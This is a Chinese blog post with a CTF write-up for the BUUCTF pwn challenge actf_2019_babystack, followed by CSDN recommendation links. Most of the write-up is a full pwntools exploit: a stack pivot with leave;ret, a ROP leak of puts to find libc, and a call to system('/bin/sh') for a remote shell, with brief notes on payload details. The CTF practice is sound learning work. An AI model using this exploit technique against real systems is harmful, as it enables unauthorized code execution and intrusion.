[BUUCTF]-PWN:actf_2019_babystack解析

最新推荐文章于 2024-05-17 19:30:00 发布
最新推荐文章于 2024-05-17 19:30:00 发布
阅读量379 收藏 3
点赞数 17
分类专栏: PWN 文章标签: 网络安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_79326813/article/details/136034853
版权

先看保护

再看ida

原本我以为会是整数溢出,但是实际上不是。这道题考到了栈迁移,并且还给了我们栈的地址,并且正好是栈顶

完整exp:

from pwn import*
from LibcSearcher import*
context(log_level='debug')
p=process('./babystack')
p=remote('node5.buuoj.cn',29218)
leave_ret=0x400a18
ret=0x400709
bss=0x6010A0
puts_plt=0x400730
puts_got=0x601020
main=0x4008F6
pop_rdi=0x400ad3
mov_rdx=0x400AB0
pop_rbx_rbp_r12_r13_r14=0x400AC6
ret=0x400709
read_got=0x601048

p.sendlineafter(b'message?',b'224')
p.recvuntil(b'at ')
rsp=int(p.recv(14),16)
print(rsp)
rbp=rsp+0xd0
payload=b'a'*8+p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(main)
payload=payload.ljust(0xd0,b'a')
payload+=p64(rsp)+p64(leave_ret)
p.sendafter(b'your message?',payload)

puts_addr=u64(p.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
print(hex(puts_addr))
libc=LibcSearcher('puts',puts_addr)
libcbase=puts_addr-libc.dump('puts')
system=libcbase+libc.dump('system')
binsh=libcbase+libc.dump("str_bin_sh")

p.sendlineafter(b'message?',b'224')
p.recvuntil(b'at ')
rsp=int(p.recv(14),16)
print(hex(rsp))
rbp=rsp+0xd0
payload=b'a'*8+p64(ret)+p64(pop_rdi)+p64(binsh)+p64(system)
payload=payload.ljust(0xd0,b'a')
payload+=p64(rsp)+p64(leave_ret)
p.sendafter(b'your message?',payload)
p.interactive()

这道题没考什么比较特别的点,但是细节非常要注意。

注意点1:原本我是将rbp覆盖为rsp-8的,但是实际上这样子会报错,直接导致接收错误。所以只能换种形式,用rsp地址覆盖rbp再进行相应调整了。

注意点2:发送payload要用send而不是sendline,因为我们输入的字节大小已经到0xe0了,再加上回车会超字数,在这道题中会导致程序出错。但第二个payload用sendline依旧可以成功

Clxhzg
关注
  • 17
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
BUUCTF pwn——ACTF_2019_babyheap
CNS-Enterprise BCC-1701-J
03-09 195
BUUCTF 做题练习
Wi-PWN:具有材料设计WebUI的ESP8266解除验证:antenna_bars:
01-28
无线网络 ESP8266的Deauther具有简洁的Web界面 :sparkles: 支持在上进行或一次通过 | | | 快速响应的Material Design UI,带有可选的暗模式 集成的(完全定制) WiFi客户端模式-在WiFi网络上访问Wi-PWN 信息页面,其中包含发送的总数据包,正常运行时间,内存使用情况,检查更新... 易于使用的翻译引擎-想要将其翻译成您自己的语言吗? 目录 介绍 什么是Wi-PWN Wi-PWN是一种固件,可在廉价的Arduino板上执行。 是一款廉价的微控制器,内置Wi-Fi。 它包含一个功能强大的160 MHz处理器,可以使用对其进行编程。 取消身份验证攻击通常会与混淆,因为它们都会阻止用户访问Wi-Fi网络。 这个怎么运作 802.11 Wi-Fi协议包含一个所谓的 。 它用于安全断开客户端与无线网络的连接。 由于这些管理数据包是未加密的,因此您只需要要与网络断开连接的Wi-Fi路由器和客户端设备的MAC地址。 您无需进入网络或知道密码,只要在其范围内即可。 如何防范 使用更新标准,默认情况下对管理帧进行加密。 在现实世界中
mqtt-pwn:MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式服务
05-02
MQTT-PWN MQTT是一种机器对机器的连接协议,被设计为一种极其轻量级的发布/订阅消息传递,并已被全球数百万个IoT设备广泛使用。 MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式商店,因为它结合了枚举,支持功能和开发模块,同时将所有这些都打包在命令行界面中,并且易于使用和可扩展的类贝壳环境。 作者 功能支持 Credential Brute-Forcer-可配置的暴力破解密码以绕过身份验证控件 主题枚举器-通过一段时间内的连续采样来建立全面的主题列表 有用的信息收集器-从包含已知感兴趣主题的可扩展预定义列表中获取和标记数据 GPS追踪器-使用OwnTracks应用绘制来自设备的路线并收集发布的坐标 Sonoff Exploiter –设计用于提取密码和其他敏感信息 可扩展性-该框架旨在轻松添加新的自定义插件 Shodan-通过Shodan.io
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
[BUUCTF]PWN——actf_2019_babystack
mcmuyanga的博客
01-19 1320
actf_2019_babystack 附件 步骤: 例行检查,64位程序,开启了nx保护 本地运行一下看看大概的情况,有两次输入 64位ida载入 程序可以输入两次,加上只能覆盖ebp和返回地址,想到的是栈迁移的方法 栈迁移主要就是使用的leave和retn这两条指令,两条指令的实质是 leave:move rbp,rsp;pop rbp retn:pop rdi 利用思路 第一个输入点固定输入0xe0,造成溢出 19行会打印出s在栈上的地址,接收一下,获得栈地址 由于没有现成的system
actf_2019_message
kjdfklha的博客
08-26 286
BUU actf_2019_message double free/tcache dup
pwnactf_2019_message(转载)
INK
08-26 191
pwn
BUUCTF-PWN-ACTF_2019_message
Rt1Text的博客
07-17 212
除了PIE,其它保护全开,规矩的堆菜单。
buuctf ACTF_2019_message(tcache bin dup / fastbin dup)
qq_36918532的博客
04-19 735
有些图片显示不出来,我懒的在复制粘贴了,可以直接去我笔记里面看 网上的这道题的,大部分的exp都是写的16.04,使用的fastbin double free,但是在buuctf上根本打不通,因为人家都要求了是18.04,,所以这里写了两个版本(均可以打通) buuctf ACTF_2019_message 安全检查:FULL RELRO(got表不可写),GS,NX都开了 菜单题(堆的) 增加函数:判断当前堆指针是否为空,为空就创建 删除函数:一是没有判断该地方是否有值,而是没有将堆指针置空,可能出
noxctf2018_grocery_list&&actf_2019_message
doudoudedi
03-17 507
noxctf2018_grocery_list 先是观察函数发现有一个可以泄露栈地址然后通过tcache attack打到栈上泄露libcbase然后再次写入free_hook拿到shell exp: #!/usr/bin/python2 from pwn import * #p=process('./GroceryList') p=remote('node3.buuoj.cn',26988) e...
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8227
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
IEN在Web3.0中的性能与安全优势
qq_29268247的博客
05-17 299
通过分布式架构、区块链技术和智能数据管理,IEN不仅提高数据传输效率和处理速度,还大幅增强网络安全性和稳定性。通过命名数据网络,IEN实现了高效的数据分发和缓存机制,减少了数据传输路径,提高了网络吞吐量。对比实验表明,IEN在处理并发请求时的延迟减少了40%,传输速率提高了30%。实验结果显示,面对突发流量时,IEN的吞吐量稳定性提高了35%,有效避免了网络拥塞。实验数据显示,IEN的加密机制将数据泄露事件减少了70%,大幅提升了数据隐私保护水平。IEN整合区块链技术,提供去中心化的信任机制。
守护长者安全,平安养老险携手福海街道开展防灾减灾活动
NewsMash的博客
05-15 125
展望未来,平安养老险深圳分公司将持续与更多养老社区携手开展系列活动,合计赠送1000份灭火袋,并推出更多关爱老年人的举措,以实际行动为构建安全、和谐的养老环境贡献力量,为老年人的金色晚年添上温暖色彩,让他们的生活更加安心、舒心。老人们在台下听的投入,并在互动环节踊跃提问。作为平安集团服务养老、保障民生的重要“窗口”,平安养老险始终坚持金融工作的政治性、人民性,以满足人民日益增长的美好生活需要作为高质量发展的出发点和落脚点,公司期待与更多关心老年人福祉的人士携手,共筑“老有所养、老有所依”的中国梦。
网站有存在哪些类型的漏洞,网站漏洞存在哪些危害,该怎么解决网站漏洞问题
dexunyun的博客
05-14 349
通过使用漏洞扫描VSS服务,我们可以及时发现网站存在的漏洞,有效降低网站漏洞的风险,保障网站安全,满足合规要求。文件上传漏洞是由于网站在处理文件上传功能时没有对上传的文件类型、大小等进行严格的验证和过滤,攻击者利用网站中的文件包含函数,将恶意文件或代码包含到网站中,从而实现远程代码执行或文件读取。网站安全是一个持续的过程,需要我们不断关注,通过及时发现存在的漏洞,我们可以针对性的处理,这样可以有效地减少网站安全漏洞的产生和危害,确保网站的安全稳定运行。同时,采用安全的编程语言和框架,减少漏洞的产生。
高效且安全的传输工具:FileLink跨网文件传输
m0_69398711的博客
05-14 451
同时,它还提供了权限控制功能,例如:文件打开次数、访问时间、禁止截屏、禁止复制、禁止打印、显示水印,有效防止了数据泄露和非法访问。然而,FileLink利用先进的网络技术和协议优化,成功打破了这一局限。它提供广泛的集成支持,权限组件、审批组件均开放API,可与企业现有IT系统充分集成,深度支撑与贯通企业跨网业务流程,致力于打造更全面的数据安全平台。综上所述,FileLink跨网文件传输以其出色的跨网络性能、安全性、多功能性、易用性以及集成扩展能力,成为了现代办公和日常生活中不可或缺的文件传输工具。
针对 % 号 | 引起的 不安全情况
m0_74381444的博客
05-11 958
%%%%%%
Llama 3 模型家族构建安全可信赖企业级AI应用之 Code Llama (一)
最新发布
段智华的博客
05-17 626
1、Llama开源模型家族大模型技术、工具和多模态详解:学员将深入了解Meta Llama 3的创新之处,比如其在语言模型技术上的突破,并学习到如何在Llama 3中构建trust and safety AI。8、Llama 3中的DPO原理、算法、组件及具体实现及算法进阶:学习Llama 3中结合使用PPO和DPO算法,剖析DPO的原理和工作机制,详细解析DPO中的关键算法组件,并通过综合项目八从零开始动手实现和测试DPO算法,同时课程将解密DPO进阶技术Iterative DPO及IPO算法。
buuctf [HarekazeCTF2019]baby_rop2
09-30
[BUUCTF-pwn]——[HarekazeCTF2019]baby_rop2是一个pwn题目。在这个题目中,主要的目标是获取read函数的地址,并利用该地址泄漏libc基址,然后计算system函数和/bin/sh字符串的地址,最终执行system('/bin/sh')获取shell权限。解题的过程中,通过找到rsi寄存器的地址,将其设置为read函数的地址,然后再通过调用printf函数,将read函数的地址泄漏出来,从而计算libc基址。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值